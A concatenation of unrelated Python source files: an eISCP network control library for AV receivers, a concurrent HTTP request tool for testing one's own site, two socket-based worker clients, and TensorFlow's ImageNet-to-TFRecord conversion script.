"""Send a low-level ISCP message, like ``MVL50``, and wait
for a response.
While the protocol is designed to acknowledge each message with
a response, there is no fool-proof way to differentiate those
from unsolicited status updates, though we'll do our best to
try. Generally, this won't be an issue, though in theory the
response this function returns to you sending ``SLI05`` may be
an ``SLI06`` update from another controller.
It'd be preferable to design your app in a way where you are
processing all incoming messages the same way, regardless of
their origin.
"""
while self.get(False):
# Clear all incoming messages. If not yet queried,
# they are lost. This is so that we can find the real
# response to our sent command later.
pass
self.send(iscp_message)
return filter_for_message(self.get, iscp_message)
def command(self, command, arguments=None, zone=None):
"""Send a high-level command to the receiver, return the
receiver's response formatted has a command.
This is basically a helper that combines :meth:`raw`,
:func:`command_to_iscp` and :func:`iscp_to_command`.
"""
iscp_message = command_to_iscp(command, arguments, zone)
response = self.raw(iscp_message)
if response:
return iscp_to_command(response)
def power_on(self):
"""Turn the receiver power on."""
return self.command('power', 'on')
def power_off(self):
"""Turn the receiver power off."""
return self.command('power', 'off')
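# Usage sketch (host address is an illustrative assumption; a reachable receiver
# is required for any response):
# for receiver in eISCP.discover(timeout=2):
#     print(receiver)                      # e.g. <eISCP(TX-NR609) 192.168.0.10:60128>
# with eISCP('192.168.0.10') as receiver:
#     receiver.power_on()                  # high-level command, see command_to_iscp()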
class Receiver(eISCP):
"""Changes the behaviour of :class:`eISCP` to use a background
thread for network operations. This allows receiving messages
from the receiver via a callback::
def message_received(message):
print(message)
receiver = Receiver('...')
receiver.on_message = message_received
The argument ``message`` is the decoded ISCP message string received from the device.
"""
@classmethod
def discover(cls, timeout=5, clazz=None):
return eISCP.discover(timeout, clazz or Receiver)
def _ensure_thread_running(self):
if not getattr(self, '_thread', False):
self._stop = False
self._queue = queue.Queue()
self._thread = threading.Thread(target=self._thread_loop)
self._thread.start()
def disconnect(self):
self._stop = True
self._thread.join()
self._thread = None
def send(self, iscp_message):
"""Like :meth:`eISCP.send`, but sends asynchronously via the
background thread.
"""
self._ensure_thread_running()
self._queue.put((iscp_message, None, None))
def get(self, *a, **kw):
"""Not supported by this class. Use the :attr:`on_message``
hook to handle incoming messages.
"""
raise NotImplementedError()
def raw(self, iscp_message):
"""Like :meth:`eISCP.raw`.
"""
self._ensure_thread_running()
event = threading.Event()
result = []
self._queue.put((iscp_message, event, result))
event.wait()
if isinstance(result[0], Exception):
raise result[0]
return result[0]
def _thread_loop(self):
def trigger(message):
if self.on_message:
self.on_message(message)
eISCP._ensure_socket_connected(self)
try:
while not self._stop:
# Clear all incoming message first.
while True:
msg = eISCP.get(self, False)
if not msg:
break
trigger(msg)
# Send next message
try:
item = self._queue.get(timeout=0.01)
except queue.Empty:
continue
if item:
message, event, result = item
eISCP.send(self, message)
# Wait for a response, if the caller so desires
if event:
try:
# XXX We are losing messages here, since
# those are not triggering the callback!
# eISCP.raw() really has the same problem,
# messages being dropped without a chance
# to get() them. Maybe use a queue after all.
response = filter_for_message(
super(Receiver, self).get, message)
except ValueError as e:
# No response received within timeout
result.append(e)
else:
result.append(response)
# Mark as processed
event.set()
finally:
eISCP.disconnect(self)
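# Usage sketch (host address is an illustrative assumption): set on_message before
# any traffic arrives, since the background thread calls it for every update.
# r = Receiver('192.168.0.10')
# r.on_message = print
# print(r.raw('PWRQSTN'))                  # low-level query, waits for the reply
# r.disconnect()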
|
surfer.py
|
import time
import random
import argparse
from multiprocessing import Process
import requests
from surfer_helper import (
ignore_keyboard_exception, resolve_post_hook, print_result
)
@ignore_keyboard_exception
def main(options):
url = options["url"]
num_processes = options["c"]
num_requests = options["n"]
response_callback = resolve_post_hook(options["post_hook"])
processes = []
for i in range(num_processes):
p = Process(target=request, args=(i, url, num_requests, response_callback))
p.start()
processes.append(p)
for p in processes:
p.join()
@ignore_keyboard_exception
def request(i, url, num_requests, response_callback):
for j in range(num_requests):
time.sleep(2 * random.random())
response = requests.get(url)
print_result(i + 1, j + 1, response)
responses = response_callback(response)
if responses:
for r in responses:
print_result(i + 1, j + 1, r)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Surf your own site concurrently')
parser.add_argument(
'url',
help='URL to use for testing. Example: http://localhost:8080',
)
parser.add_argument(
'-c',
type=int,
default=1,
help='Number of concurrent processes. Example: -c 10',
)
parser.add_argument(
'-n',
type=int,
default=1,
help='Number of requests per process. Example: -n 10',
)
parser.add_argument(
'--post-hook',
help="""
Dotted path to a python module with a method called run
that takes the completed response and does something custom.
Can optionally return a list of new responses that will then be
logged to console the same way normal requests are.
Example: --post-hook my_module
(where my_module.py is in the same directory and contains
"def run(response): ...")
"""
)
kwargs = parser.parse_args()
main(vars(kwargs))
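# Example post-hook module (sketch; the module name my_module.py is an assumption),
# matching the contract described in the --post-hook help text above:
# def run(response):
#     if response.status_code != 200:
#         print('non-200 response from', response.url)
#     return None    # or return a list of extra responses to be logged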
|
client.py
|
import logging
import subprocess
import multiprocessing
import sys
import uuid
import time
from socketIO_client import SocketIO, LoggingNamespace, BaseNamespace
class appOUT(object):
def __init__(self,log_queue=None):
self.logger=log_queue
def flush(self):
pass
def write(self, s):
self.logger.put("[syslog][{2}][{1}]{0}".format(s,time.asctime( time.localtime(time.time()) ),multiprocessing.current_process().name))
#sys.__stdout__.write(s)
class app_client(BaseNamespace):
def __init__(self,*args):
BaseNamespace.__init__(self,*args)
self.run_ready=multiprocessing.Lock()
self.run_ready.acquire()
#self init
manager=multiprocessing.Manager()
self.log=manager.Queue()
self.log_err=manager.Queue()
self.requestQueue = manager.Queue()
self.responseQueue = manager.Queue()
self.prepare()
def prepare(self):
"""
run on the start and init all
"""
self.metadata={}
self.run_ready.release()
pass
def on_ask_init(self,*args):
info_pack=args[0]
self.metadata=info_pack
# print("\n\n\ninfo:\nsid:{0}\nthread:{1}\n\n".format(self.metadata['sid'],self.metadata['thread_id']))
self.emit("client_free", info_pack)
def on_connect(self, *args):
#self.emit("client_free", None)
pass
def on_task(self, *args):
p = multiprocessing.Process(target=self.run_mp, args=(args[0],))
p.start()
return
def run_mp(self,arg):
#arg['metadata']=self.metadata
ret={'metadata':arg['metadata'],"status":-1,"arg":arg,"err":""}
pkg=self.run(arg)
        if pkg['err']:
            # Record the error string before re-raising it.
            ret['err']="{0}".format(pkg['err'])
            raise pkg['err']
else:
ret={'metadata':arg['metadata'],"status":1,"arg":pkg['ret']}
self.emit('result',ret)
    def thread_loop(self,id,stdout=sys.__stdout__,stderr=sys.__stderr__):
raise NotImplementedError()
def boot_mp(self,thread_num=4):
class appOUT(object):
def __init__(self,log_queue):
self.logger=log_queue
def flush(self):
pass
def write(self, s):
self.logger.put(s)
#sys.__stdout__.write(s)
self.p_list=[None for i in range(thread_num)]
self.p_list_pipe=[None for i in range(thread_num)]
for i in range(thread_num):
self.p_list[i]=multiprocessing.Process(target=self.thread_loop ,args=(i, appOUT(self.log), appOUT(self.log_err)),name="Task_thread_{0}".format(i))
self.p_list[i].start()
def run(self,args):
"""
:param args all needed data from server
"""
local_id = "{0}".format(uuid.uuid4())
pkg={"args":args,'local_id':local_id}
self.requestQueue.put(pkg)
p={}
while (1):
p = self.responseQueue.get()
if p['id'] == local_id:
break
self.responseQueue.put(p)
return {'ret':p['tensor'],'err':p['err']}
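# A hypothetical subclass sketch (not part of the original client) showing
# what a thread_loop() compatible with boot_mp() and run() above could look
# like: it consumes packages from requestQueue and answers on responseQueue
# with the 'id'/'tensor'/'err' keys that run() expects. The "work" here is a
# placeholder echo.
class _EchoClientSketch(app_client):
    def thread_loop(self, id, stdout=sys.__stdout__, stderr=sys.__stderr__):
        sys.stdout = stdout
        sys.stderr = stderr
        while True:
            pkg = self.requestQueue.get()
            try:
                result, err = pkg["args"], ""  # placeholder work: echo args
            except Exception as e:
                result, err = None, e
            self.responseQueue.put(
                {"id": pkg["local_id"], "tensor": result, "err": err})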
|
client.py
|
import socket
import requests
import sys
from socket import AF_INET, SOCK_STREAM
import threading
import time
import logging
logging.basicConfig(filename="client.log", level=logging.DEBUG)
logger = logging.getLogger(" [CLIENT] - ")
class IRCClient(object):
def __init__(self, host, port, name):
self.host = host
self.port = port
self.name = name
    def return_res(self, data):
        # Sum the comma-separated integers in a "COMPUTE a,b,c" request,
        # e.g. "COMPUTE 1,2,3" -> "6".
        data = data.split(" ")[1].split(",")
        output_f = 0
        for item in data:
            output_f += int(item)
        return str(output_f)
def start_client(self):
s_fd = socket.socket(AF_INET, SOCK_STREAM)
s_fd.connect((self.host, self.port))
self.register_client(s_fd)
threading.Thread(target=self.listen_for_server_input, args=(s_fd, )).start()
# To allow proper printing of description on console
time.sleep(2)
first_time = True
while True:
data = raw_input("")
s_fd.sendall(data)
s_fd.close()
def listen_for_server_input(self, s_fd):
logger.info("Listening for server input on separate thread\n")
while True:
data = s_fd.recv(4096)
print("[SERVER] - {}".format(data))
if "COMPUTE" in data.split(" ")[0]:
print("Server wants client to compute something {}".format(data))
s_fd.sendall("COMPUTE " + self.return_res(data))
print("Sent COMPUTE to server")
s_fd.sendall("COMPUTE {}".format(16))
print("Sent COMPUTE {}".format(16))
def register_client(self, s_fd):
logger.debug("Registering client")
s_fd.sendall("REGISTER {}\n".format(self.name))
data = s_fd.recv(4096)
print(data)
def main(host, port, name):
irc_client = IRCClient(host, int(port), name)
irc_client.start_client()
if __name__ == '__main__':
if len(sys.argv) < 2:
print("Usage: python client.py <name>")
sys.exit(1)
else:
host, port, name = requests.get("http://localhost:6666/server").text.split(":")
try:
main(host, port, sys.argv[1])
except socket.error:
print("Exception caught while connecting to server, please check if {}:{} is running".format(host, port))
|
build_imagenet_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFRecord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
  image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
from six.moves import xrange
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file contains the mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist multiple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
  image_data = tf.gfile.FastGFile(filename, 'rb').read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
    thread_index: integer, unique thread index within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
  # Break all images into batches given by [ranges[i][0], ranges[i][1]).
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
  shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
    Note that there might exist multiple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
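# A reader-side sketch (not part of the original converter), assuming the same
# TF 1.x API used above: parsing one serialized Example written by this script,
# using a subset of the documented feature keys. The function name is
# hypothetical.
def _parse_example_sketch(serialized_example):
  features = {
      'image/encoded': tf.FixedLenFeature([], tf.string),
      'image/height': tf.FixedLenFeature([], tf.int64),
      'image/width': tf.FixedLenFeature([], tf.int64),
      'image/class/label': tf.FixedLenFeature([], tf.int64),
      'image/class/text': tf.FixedLenFeature([], tf.string, default_value=''),
      'image/object/bbox/xmin': tf.VarLenFeature(tf.float32),
      'image/object/bbox/ymin': tf.VarLenFeature(tf.float32),
      'image/object/bbox/xmax': tf.VarLenFeature(tf.float32),
      'image/object/bbox/ymax': tf.VarLenFeature(tf.float32),
  }
  parsed = tf.parse_single_example(serialized_example, features)
  image = tf.image.decode_jpeg(parsed['image/encoded'], channels=3)
  return image, parsed['image/class/label']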
|
StartSkip.py
|
